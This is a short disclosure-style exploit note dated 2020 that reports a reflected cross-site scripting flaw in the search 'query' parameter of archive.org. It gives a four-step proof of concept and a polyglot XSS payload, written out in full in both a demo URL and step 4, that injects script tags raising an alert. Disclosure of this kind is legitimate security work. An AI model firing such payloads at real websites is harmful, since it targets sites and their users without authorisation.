#Exploit Title : archive.org XSS
#Date : 2020/3/29
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : win10
#Demo : https://archive.org/search.php?query=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
#POC:
1- go to archive.org
2-go to meta data search (archive.org/search.php?query=)
3-Parameter query is vulnerable
4-payload is: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
